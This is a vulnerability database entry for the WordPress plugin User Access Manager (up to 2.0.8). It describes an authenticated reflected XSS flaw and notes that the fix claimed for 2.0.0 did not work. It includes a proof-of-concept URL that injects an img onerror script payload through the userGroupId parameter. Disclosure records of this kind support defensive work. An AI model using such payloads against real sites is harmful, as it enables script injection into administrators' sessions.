WordPress Plugin Vulnerabilities
User Access Manager <= 2.0.8 - Authenticated Reflected Cross-Site Scripting (XSS)
Description
Not patched in 2.0.0 despite what the advisory states.
Proof of Concept
http://www.example.com/wp-admin/admin.php?page=uam_user_group&uam_action=edit_user_group&userGroupId=1%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E%3C%22
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
Miscellaneous
Submitter
ethicalhack3r
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2017-05-11 (about 7 years ago)
Added
2017-05-12 (about 7 years ago)
Last Updated
2019-11-01 (about 4 years ago)